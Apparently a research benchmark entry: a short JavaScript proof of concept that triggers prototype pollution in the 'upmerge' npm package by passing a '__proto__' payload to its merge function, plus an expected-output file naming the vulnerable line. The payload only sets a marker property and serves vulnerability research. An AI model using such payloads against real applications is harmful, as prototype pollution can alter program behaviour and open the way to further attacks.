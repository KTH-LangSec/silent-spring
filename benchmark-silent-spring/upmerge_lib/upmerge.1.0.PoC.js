//https://snyk.io/vuln/SNYK-JS-UPMERGE-174133
let upmerge = require("upmerge"); // this is a minified version
upmerge.merge({}, JSON.parse('{"__proto__":{ "polluted" : "yes" } }'));
