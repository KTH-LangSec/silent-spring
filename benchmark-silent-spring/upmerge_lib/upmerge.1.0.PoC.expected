node_modules/upmerge/build/upmerge.js:1:1247